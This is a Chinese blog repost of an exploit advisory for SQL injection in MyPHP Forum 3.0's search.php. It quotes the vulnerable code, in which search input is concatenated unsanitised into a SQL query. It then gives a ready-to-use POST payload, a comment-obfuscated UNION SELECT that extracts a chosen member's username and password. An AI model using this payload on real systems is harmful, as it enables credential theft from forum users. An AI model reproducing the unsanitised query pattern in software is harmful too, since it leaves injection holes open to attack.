MyPHP Forum <= 3.0 (Final) 远程SQL注射攻击

MyPHP Forum v3.0 (Final) And Maybe Lower Multiple Sql Injection Vulnerabilities (Mq=Off/On)

Related Codes: search.php; line 14:

if($_POST['submit']) {
	$searchtext = $_POST['searchtext'];
	$searchuser = $_POST['searchuser'];

	if(!strstr($searchtext, '"')) {
		$keywords = explode(" ", $searchtext);
		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords&#91;$i&#93;%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords&#91;$i&#93;%'";
			}
		}
	} else {
		$phrase = trim(stripslashes(strstr($searchtext, '"')));
		$quotesarr = explode('"', $phrase);
		$quotes = count($quotesarr);
		$phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);

		for($i = 0; $i < $quotes; $i++) {
			if($i != 0 && $i != $quotes - 1) {
				if($phraseoff != "yes") {
					$phraselist .= "$quotesarr&#91;$i&#93;|";
					$phraseoff = "yes";
				} else {
					$phraseoff = "no";
				}
			}
		}

		$phrasearr = explode("|", $phraselist);
		$phrases = count($phrasearr) - 1;

		for($i = 0; $i < $phrases; $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$phrasearr&#91;$i&#93;%'";
			} else {
				$sqladdon .= "p.message LIKE '%$phrasearr&#91;$i&#93;%'";
			}
		}
		
		$newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));

		if($newsearchtxt != "") {
			$keywords = explode(" ", $newsearchtxt);
		}

		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords&#91;$i&#93;%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords&#91;$i&#93;%'";
			}
		}
	}

	if($searchuser != "") {
		if($sqladdon != "") {
				$sqladdon .= " AND p.author LIKE '%$searchuser%'";
			} else {
				$sqladdon .= "p.author LIKE '%$searchuser%'";
			}
	}

	if($sqladdon != "" ) {
		search_header();
		$ttnum = 1;		// Now the Vulnerable Query =)
		$query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());
		
"""&#91;/code&#93;

POST
&#91;code lang="php"&#93;submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"

注意:最后一个”双引号必须带着!
适用版本:MyPHP Forum v3.0

关注微信公众号,手机阅读更方便: 程序员的阅微草堂

知识共享许可协议莿鸟栖草堂CFC4N 创作,采用 知识共享 署名-非商业性使用-相同方式共享(3.0未本地化版本)许可协议进行许可。基于http://www.cnxct.com上的作品创作。转载请注明转自:MyPHP Forum <= 3.0 (Final) 远程SQL注射攻击

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据